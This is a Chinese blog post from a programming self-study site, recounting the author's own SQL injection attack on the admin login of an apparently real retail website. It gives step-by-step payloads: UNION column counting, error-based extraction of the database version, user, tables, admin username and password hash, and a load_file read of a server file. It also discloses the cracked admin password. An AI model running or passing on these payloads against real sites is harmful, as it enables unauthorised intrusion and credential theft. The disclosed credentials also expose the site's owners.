好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

登录注入实践运用 - 网站安全 - 自学php

 今天在** 论坛 中闲逛的时候,看见一个求助tie,就进去看了一下

网站:http://HdhCmsTestsmartbuyglasses测试数据.tw//admin/login.php   恰好刚刚学习了  登录刚注入   正好实践一下 在  username:框中输入   1’ and 1=2 # Password: 框中输入   任意字符    (在密码框中不要输入注入代码,因为MD5加密) 出现页面 接着   在用户名框中输入   1’ or 1=1  # 出现界面          到这里  我们就知道  如果出错就会出现第一个情况,正确就会跳转到另一个页面。 接着我们确定表段数 在  用户名框中输入 1’  union select 1 # 出现界面 HdhCmsTest2cto测试数据 从这个页面中我们可以得到信息,  存储用户密码的表是 user_information 用户字段名   username     密码字段名  password 重要的是  The used SELECT statements have a different number of columns 说明  字段数不匹配 接着在  用户名框中输入  1’ union select1,2 #       出错     1’ union select 1,,2,3#      出错 当输入                  1’ union  select 1,2,3,4#         返回到   说明 是4个字段      接着  判断他的 版本   在   用户框中输入 'union select 1 from (select count(*),concat(floor(rand(0)*2),(select version()))a from information_schema.tables group by a)b#   5.0.95     可以利用information_schema 来暴库 看看用户 'union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b#   用户名 root  我去     内网的 数据库 'union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()))a from information_schema.tables group by a)b#   数据库 :sbg 有了这些信息后 ,你可以 利用information_schema来暴库 在用户名  输入   爆出 表名 'union select 2 from (select count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))a from information_schema.tables group by a)b# 大家只要 将 limit 0,1   0 慢慢加一就行了     得出第一个  CL_category 因为 我们刚才 从错误信息 可以的出  用户表   是user_information 所以 不需要爆了    这里 我们  爆一下他的用户名 在用户名框中输入 'union select 2 from (select count(*),concat(floor(rand(0)*2),(select username from user_information))a from information_schema.tables group by a)b# 爆出密码  :  admin 接着爆密码 'union select 2 from (select count(*),concat(floor(rand(0)*2),(select password from user_information))a from information_schema.tables group by a)b# 得出hash  e041cd802629792e7e6e0d0e3ed287d9   到 cmd5  解密   有收费 没钱的孩子 伤不起  到群里问问吧 好人还是多按      密码  :nekiowang 但是不知道 怎么了   我的密码 就是登不上去         郁闷了   刚才 用户是 root  大家也可以  读他的配置文件    输入代码 'union select 2 from (select count(*),concat(floor(rand(0)*2),(substring(load_file(0x2F6574632F6973737565),1,64)))a from information_schema.tables group by a)b# 来读   linux的 /etc/issue  内核参数   好了  登录注入  就到 这了 这个真的是我亲自做的  

查看更多关于登录注入实践运用 - 网站安全 - 自学php的详细内容...

  阅读:38次